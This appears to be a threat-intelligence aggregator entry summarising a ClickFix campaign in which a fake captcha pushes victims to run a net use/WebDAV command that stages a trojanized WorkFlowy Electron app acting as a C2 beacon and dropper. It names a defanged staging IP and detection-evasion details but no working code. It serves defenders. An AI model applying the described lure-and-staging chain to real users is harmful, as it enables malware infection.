ClickFix variant analysis of net use/WebDAV staging and trojanized WorkFlowy app.asar

Technical Analysis

First reported

13.03.2026 15:28

Last updated

13.03.2026 15:28

Happening score

H score 19

1 unique sources, 1 articles

Summary

Hide ▲

A new ClickFix flow now uses Win+R, net use, and WebDAV to stage malware through a trojanized WorkFlowy Desktop Electron app, increasing evasion against common script-based detections. The lure begins with a fake captcha page and pushes the victim to launch the command themselves, which makes the execution look user-driven. The malicious logic is hidden in app.asar / main.js, where it acts as a C2 beacon and dropper. The flow matters because it bypassed Microsoft Defender for Endpoint and required RunMRU-based hunting to surface.

Timeline

13.03.2026 15:28 2 articles · 2mo ago

ClickFix WebDAV staging and trojanized WorkFlowy delivery

Technical Analysis Update
A new ClickFix variant abuses Win+R and net use to mount a WebDAV share from 94.156.170[.]255, run update.cmd, download flowy.zip, and start a trojanized WorkFlowy Desktop 1.4.1050 Electron app. The malicious app.asar/main.js code behaves as a C2 beacon and dropper, fingerprints victims with %APPDATA%\id.txt, and was observed bypassing Microsoft Defender for Endpoint while defenders relied on RunMRU-focused threat hunting to identify the execution chain.
Show sources

Investigating a New Click-Fix Variant — thehackernews.com — 13.03.2026 15:28

Investigating a New Click-Fix Variant — thehackernews.com — 13.03.2026 15:28
Open in new tab

Summary

Timeline

ClickFix WebDAV staging and trojanized WorkFlowy delivery